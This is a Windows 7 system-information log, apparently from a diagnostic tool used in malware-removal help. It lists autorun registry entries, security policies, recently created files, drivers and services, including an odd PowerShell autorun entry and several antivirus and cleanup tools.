[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-26 172640]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"UCam_Menu"=C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [2007-12-24 222504]
"USB Antivirus"=C:\Program Files\USB Disk Security\USBGuard.exe [2008-09-23 798720]
"StartCCC"=C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [2013-03-28 642656]
"IgfxTray"=C:\Windows\system32\igfxtray.exe [2011-08-09 142616]
"HotKeysCmds"=C:\Windows\system32\hkcmd.exe [2011-08-09 177432]
"Persistence"=C:\Windows\system32\igfxpers.exe [2011-08-09 176408]
"PWRISOVM.EXE"=C:\Program Files\PowerISO\PWRISOVM.EXE [2016-06-07 406664]
"BullGuard"=C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe [2016-09-04 1178392]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"=C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20 1174016]
"GoogleChromeAutoLaunch_66044D0238289D879AA089D4FF4B32EE"=C:\Program Files\Google\Chrome\Application\chrome.exe [2016-08-02 961352]
"{C278BE4D-C4D5-43CE-B864-81522531FC8F}"=C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [2009-07-13 452608]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\Windows\system32\igfxdev.dll [2011-08-09 294400]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsMain]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsScanner]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsMain]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsScanner]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsUpdate]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=181
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"VIDC.UYVY"=msyuv.dll
"VIDC.YUY2"=msyuv.dll
"VIDC.YVYU"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"VIDC.YVU9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"vidc.cvid"=iccvid.dll
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"aux2"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"aux3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"aux4"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv

======File associations======

.inf - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1
.ini - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - "%SystemRoot%\System32\WScript.exe" "%1" %*
.txt - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1

======List of files/folders created in the last 1 month======

2016-09-07 16:20:35 ----D---- C:\Program Files\trend micro
2016-09-07 16:20:34 ----D---- C:\rsit
2016-09-07 15:53:30 ----SD---- C:\32788R22FWJFW
2016-09-07 15:50:32 ----D---- C:\Program Files\Malwarebytes Anti-Malware
2016-09-07 15:50:32 ----A---- C:\Windows\system32\drivers\mwac.sys
2016-09-07 15:50:32 ----A---- C:\Windows\system32\drivers\mbamchameleon.sys
2016-09-07 15:49:18 ----A---- C:\Windows\system32\drivers\mbamswissarmy.sys
2016-09-07 15:49:17 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Malwarebytes
2016-09-07 15:49:08 ----D---- C:\ProgramData\Malwarebytes
2016-09-07 15:49:07 ----A---- C:\Windows\system32\drivers\mbam.sys
2016-09-07 15:49:06 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2016-09-04 17:18:54 ----A---- C:\Windows\system32\BgGamingMonitor.dll
2016-09-04 17:18:45 ----A---- C:\Windows\system32\BGLsp.dll
2016-09-04 17:16:06 ----D---- C:\Program Files\Common Files\AV
2016-09-04 17:14:37 ----D---- C:\Program Files\BullGuard Ltd
2016-09-04 17:09:46 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\BullGuard
2016-09-04 17:07:17 ----D---- C:\Program Files\Common Files\BullGuard Ltd
2016-09-04 17:06:48 ----D---- C:\ProgramData\Package Cache
2016-09-04 17:05:49 ----D---- C:\ProgramData\BullGuard
2016-09-04 16:59:17 ----D---- C:\ProgramData\Dumps
2016-09-04 16:54:27 ----D---- C:\Program Files\Bitdefender
2016-09-04 16:34:14 ----A---- C:\bdlog.txt
2016-09-04 16:32:06 ----D---- C:\ProgramData\BDLogging
2016-09-04 16:32:02 ----A---- C:\Windows\capicom.dll
2016-09-04 16:26:43 ----A---- C:\ComboFix.txt
2016-09-04 16:24:00 ----SHD---- C:\$RECYCLE.BIN
2016-09-04 16:23:44 ----ASH---- C:\pagefile.sys
2016-09-04 16:22:25 ----D---- C:\Windows\temp
2016-09-04 16:13:06 ----A---- C:\Windows\zip.exe
2016-09-04 16:13:06 ----A---- C:\Windows\SWSC.exe
2016-09-04 16:13:06 ----A---- C:\Windows\SWREG.exe
2016-09-04 16:13:06 ----A---- C:\Windows\sed.exe
2016-09-04 16:13:06 ----A---- C:\Windows\PEV.exe
2016-09-04 16:13:06 ----A---- C:\Windows\NIRCMD.exe
2016-09-04 16:13:06 ----A---- C:\Windows\MBR.exe
2016-09-04 16:13:06 ----A---- C:\Windows\grep.exe
2016-09-04 16:13:01 ----D---- C:\Qoobox
2016-09-04 16:12:47 ----D---- C:\Windows\erdnt
2016-09-04 16:05:28 ----D---- C:\ProgramData\Bitdefender Agent
2016-09-04 16:02:42 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\QuickScan
2016-09-04 15:49:02 ----D---- C:\ProgramData\Norton
2016-09-04 15:48:47 ----D---- C:\ProgramData\NortonInstaller
2016-09-04 15:32:02 ----D---- C:\AdwCleaner
2016-09-02 15:38:58 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Tropico 5
2016-09-02 15:38:11 ----A---- C:\Windows\system32\XAudio2_7.dll
2016-09-02 15:38:11 ----A---- C:\Windows\system32\XAPOFX1_5.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAudio2_6.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAudio2_5.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAPOFX1_4.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_7.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_6.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_5.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\X3DAudio1_7.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DX9_43.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DX9_42.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx11_43.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx11_42.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx10_43.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx10_42.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dcsx_43.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dcsx_42.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DCompiler_43.dll
2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DCompiler_42.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_4.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_3.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_2.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_3.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_2.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_1.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\xactengine3_4.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\xactengine3_3.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\X3DAudio1_6.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\X3DAudio1_5.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DX9_41.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DX9_40.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\d3dx10_41.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DCompiler_41.dll
2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DCompiler_40.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\XAudio2_1.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\XAPOFX1_0.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\xactengine3_2.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\xactengine3_1.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\X3DAudio1_4.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DX9_39.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DX9_38.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\d3dx10_39.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\d3dx10_38.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DCompiler_39.dll
2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DCompiler_38.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\XAudio2_0.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\xactengine3_0.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\xactengine2_10.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\X3DAudio1_3.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DX9_37.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx9_36.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx10_37.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx10_36.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DCompiler_37.dll
2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DCompiler_36.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\xinput1_3.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_9.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_8.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_7.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\X3DAudio1_2.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_35.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_34.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_33.dll
2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx10_35.dll
2016-09-02 15:38:06 ----A----
C:\Windows\system32\d3dx10_34.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx10_33.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_35.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_34.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_33.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xinput1_2.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_6.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_5.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_4.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_3.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\x3daudio1_1.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx9_32.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx9_31.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx10.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xinput1_1.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xactengine2_2.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xactengine2_1.dll 2016-09-02 15:37:59 ----A---- C:\Windows\system32\d3dx9_30.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\xactengine2_0.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\x3daudio1_0.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_29.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_28.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_27.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_26.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_25.dll 2016-09-02 15:37:57 ----A---- C:\Windows\system32\d3dx9_24.dll 2016-09-02 15:35:44 ----D---- C:\Program Files\Tropico 5 2016-09-02 15:26:53 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\PowerISO 2016-09-02 15:23:42 ----D---- C:\Program Files\PowerISO ======List of files/folders modified in the last 1 month====== 2016-09-07 16:20:35 ----RD---- C:\Program Files 2016-09-07 16:19:51 
----D---- C:\Users\DACAT Computer's\AppData\Roaming\uTorrent 2016-09-07 15:50:32 ----D---- C:\Windows\system32\drivers 2016-09-07 15:49:08 ----D---- C:\ProgramData 2016-09-07 05:48:10 ----D---- C:\Windows\system32\config 2016-09-07 03:41:00 ----D---- C:\Windows\inf 2016-09-07 03:40:23 ----D---- C:\Windows 2016-09-07 03:40:14 ----D---- C:\Windows\System32 2016-09-06 17:09:46 ----D---- C:\Windows\system32\catroot2 2016-09-06 10:44:19 ----D---- C:\Windows\Panther 2016-09-06 10:44:19 ----D---- C:\Windows\Logs 2016-09-06 10:44:19 ----D---- C:\Windows\debug 2016-09-06 10:44:17 ----D---- C:\Windows\Minidump 2016-09-06 10:44:06 ----SHD---- C:\System Volume Information 2016-09-04 17:16:06 ----D---- C:\Program Files\Common Files 2016-09-04 17:16:00 ----D---- C:\Windows\system32\Tasks 2016-09-04 17:09:47 ----SD---- C:\ProgramData\Microsoft 2016-09-04 17:09:39 ----D---- C:\Windows\system32\DriverStore 2016-09-04 17:09:39 ----D---- C:\Windows\system32\catroot 2016-09-04 17:07:16 ----SHD---- C:\Windows\Installer 2016-09-04 17:06:03 ----HD---- C:\Windows\system32\GroupPolicy 2016-09-04 16:56:49 ----D---- C:\Windows\system32\drivers\etc 2016-09-04 16:24:01 ----A---- C:\Windows\system.ini 2016-09-04 16:19:26 ----D---- C:\Windows\AppPatch 2016-09-04 15:52:42 ----D---- C:\Windows\Prefetch 2016-09-04 15:33:48 ----D---- C:\ProgramData\Lavasoft 2016-09-02 15:38:04 ----RSD---- C:\Windows\assembly 2016-09-02 15:38:02 ----D---- C:\Windows\Microsoft.NET 2016-09-02 15:22:27 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Nero 2016-08-22 13:50:16 ----A---- C:\Windows\system32\PerfStringBackup.INI 2016-08-09 16:25:56 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\vlc ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R0 hpdskflt;HP Filter; C:\Windows\system32\DRIVERS\hpdskflt.sys [2012-09-24 27968] R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-20 173440] R1 AFW;Agnitum Firewall Driver; 
C:\Windows\system32\DRIVERS\afw.sys [2016-01-13 44720] R1 BdAgent;BullGuard Security Agent; C:\Windows\system32\DRIVERS\BdAgent.sys [2016-01-13 98608] R1 BdSpy;BdSpy; C:\Windows\system32\drivers\BdSpy.sys [2016-01-13 69512] R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-20 388096] R1 NovaShieldFilterDriver;NovaShieldFilterDriver; C:\Windows\system32\DRIVERS\NSKernel.sys [2016-09-04 264416] R1 NovaShieldTDIDriver;NovaShieldTDIDriver; C:\Windows\system32\DRIVERS\NSNetmon.sys [2016-09-04 21328] R1 SCDEmu;SCDEmu; C:\Windows\system32\drivers\SCDEmu.sys [2016-05-24 123968] R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-13 48128] R3 Accelerometer;HP Mobile Data Protection Sensor; C:\Windows\system32\DRIVERS\Accelerometer.sys [2012-09-24 37696] R3 afwcore;afwcore; C:\Windows\system32\DRIVERS\afwcore.sys [2016-01-13 338608] R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2011-10-01 8396800] R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2011-10-01 247808] R3 BdNet;BdNet; C:\Windows\system32\DRIVERS\BdNet.sys [2016-01-13 27800] R3 BthEnum;Servicio enumerador de Bluetooth; C:\Windows\system32\DRIVERS\BthEnum.sys [2009-07-13 34816] R3 BthPan;Dispositivo Bluetooth (Red de área personal); C:\Windows\system32\DRIVERS\bthpan.sys [2009-07-13 93696] R3 BTHUSB;Controladora USB de radio Bluetooth; C:\Windows\System32\Drivers\BTHUSB.sys [2010-11-20 60416] R3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver; C:\Windows\system32\DRIVERS\FLxHCIc.sys [2013-02-25 205992] R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\Windows\system32\DRIVERS\GEARAspiWDM.sys [2012-10-03 26840] R3 intelkmd;intelkmd; C:\Windows\system32\DRIVERS\igdpmd32.sys [2011-08-09 10843136] R3 MEI;Intel(R) Management Engine Interface ; C:\Windows\system32\DRIVERS\HECI.sys [2013-01-23 56432] R3 NETwNs32;___ Controlador del adaptador Intel(R) Wireless WiFi Link para Windows 7 de 32 bits; 
C:\Windows\system32\DRIVERS\NETwsn00.sys [2013-07-10 10382576] R3 RFCOMM;Dispositivo Bluetooth (TDI protocolo RFCOMM); C:\Windows\system32\DRIVERS\rfcomm.sys [2009-07-13 129536] R3 RSPCIESTOR;Realtek PCIE CardReader Driver; C:\Windows\system32\DRIVERS\RtsPStor.sys [2013-05-16 267336] R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt86win7.sys [2013-04-10 651848] R3 Trufos;Trufos; C:\Windows\system32\DRIVERS\Trufos.sys [2016-03-31 428832] R3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesDriver32.sys [2011-06-06 10064] R3 WinUsb;WinUSB Driver; C:\Windows\system32\DRIVERS\WinUSB.sys [2010-11-20 35968] S2 eamonm;eamonm; C:\Windows\system32\DRIVERS\eamonm.sys [] S2 Parvdm;Parvdm; C:\Windows\system32\drivers\parvdm.sys [2009-07-13 8704] S3 aic78xx;aic78xx; C:\Windows\system32\drivers\djsvs.sys [2009-07-13 70720] S3 amdagp;AMD AGP Bus Filter Driver; C:\Windows\system32\drivers\amdagp.sys [2009-07-13 53312] S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0; C:\Windows\system32\DRIVERS\b57nd60x.sys [2009-07-13 229888] S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2009-07-13 78336] S3 BTHPORT;Controlador de puertos Bluetooth; C:\Windows\System32\Drivers\BTHport.sys [2010-11-20 393216] S3 catchme;catchme; \??\C:\Users\DACATC~1\AppData\Local\Temp\catchme.sys [] S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-20 62464] S3 Netaapl;Apple Mobile Device Ethernet Service; C:\Windows\system32\DRIVERS\netaapl.sys [2014-08-15 18944] S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-13 12368] S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-20 133632] S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2010-11-20 15872] S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-20 5632] S3 sdbus;sdbus; 
C:\Windows\system32\DRIVERS\sdbus.sys [2010-11-20 84992] S3 sisagp;SIS AGP Bus Filter; C:\Windows\system32\drivers\sisagp.sys [2009-07-13 52304] S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-20 28032] S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-20 77184] S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2010-11-20 25600] S3 TsUsbFlt;@%SystemRoot%\system32\drivers\tsusbflt.sys,-1; C:\Windows\System32\drivers\tsusbflt.sys [2010-11-20 52224] S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264] S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-20 112640] S3 USBAAPL;Apple Mobile USB Driver; C:\Windows\System32\Drivers\usbaapl.sys [2014-08-15 45056] S3 usbscan;Controlador de escáner USB; C:\Windows\system32\DRIVERS\usbscan.sys [2009-07-13 35840] S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys [] S3 viaagp;VIA AGP Bus Filter; C:\Windows\system32\drivers\viaagp.sys [2009-07-13 53328] S3 ViaC7;VIA C7 Processor Driver; C:\Windows\system32\drivers\viac7.sys [2009-07-13 52736] S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-20 175360] S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-20 17920] ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2011-10-01 176128] R2 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-01-19 60744] R2 Bonjour Service;Servicio Bonjour; C:\Program Files\Bonjour\mDNSResponder.exe [2011-08-30 390504] R2 BsBackup;BullGuard backup service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsBhvScan;BullGuard Behavioural Detection; C:\Program Files\BullGuard 
Ltd\BullGuard\BullGuardBhvScanner.exe [2016-09-04 590104] R2 BsCache;BullGuard cache service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsFileScan;BullGuard on-access service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsFire;BullGuard firewall service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsMailProxy;BullGuard e-mail monitoring service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsMain;BullGuard Main Service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsScanner;BullGuard scanning service; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe [2016-09-04 251160] R2 BsUpdate;BullGuard update service; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe [2016-09-04 343832] R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-13 20992] R2 hpsrv;HP Service; C:\Windows\system32\Hpservice.exe [2012-09-24 27968] R2 TuneUp.UtilitiesSvc;TuneUp Utilities Service; C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesService32.exe [2011-07-18 1526592] R2 UxTuneUp;@%SystemRoot%\System32\uxtuneup.dll,-4096; C:\Windows\System32\svchost.exe [2009-07-13 20992] S2 gupdate;Servicio de Google Update (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-24 107848] S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-13 20992] S3 gupdatem;Servicio de Google Update (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-24 107848] S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2010-06-10 136120] S3 iPod Service;Servicio del iPod; C:\Program Files\iPod\bin\iPodService.exe [2015-02-13 540968] S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe [2016-04-22 147624] S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 149352] S3 osppsvc;Office 
Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4640000] S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-13 20992] S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-13 20992] -----------------EOF-----------------